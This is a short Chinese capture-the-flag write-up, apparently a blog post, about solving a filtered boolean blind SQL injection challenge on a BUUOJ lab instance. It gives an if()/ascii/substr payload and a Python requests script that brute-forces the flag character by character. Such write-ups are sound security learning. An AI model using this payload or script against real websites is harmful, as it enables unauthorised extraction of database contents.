sql注入之简单的盲注。
为什么很多题目总是怪怪的???
输入1返回正常,但是1 and 1=1显示异常。fuzz大法启动
这些东西被禁用了。实际上"(and)"也被禁用了,看来fuzz字典还是少了很多。
刚好它告诉你表名与列名都是flag,省去了不少事。然后返回是bool值,所以是盲注
我开始的想法是"ascii(substr((select(flag)from(flag)),1,1))=102" 一直返回失败,不知道为什么
后边改成了如下的payload
if(ascii(substr((select(flag)from(flag)),1,1))=102,1,2)外边包一层if语句就ok了 。。。浪费了我好久的时间
然后写脚本flag就ok了
import requests
flag=''
url='http://17f2cea2-e442-4c1b-b431-f9766c507108.node5.buuoj.cn:81/index.php'
for i in range(1,50,1):
for y in range(1,128,1):
payload='if(ascii(substr((select(flag)from(flag)),'+str(i)+',1))='+str(y)+',1,2)'
datas={"id":payload}
content=requests.post(url,data=datas)
if "glzjin wants a girlfriend" in content.text:
flag=flag+chr(y)
print(flag)
break这个脚本运行时间很长,因为我不懂算法。不能跟大佬的脚本比。运行结果如下
611
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
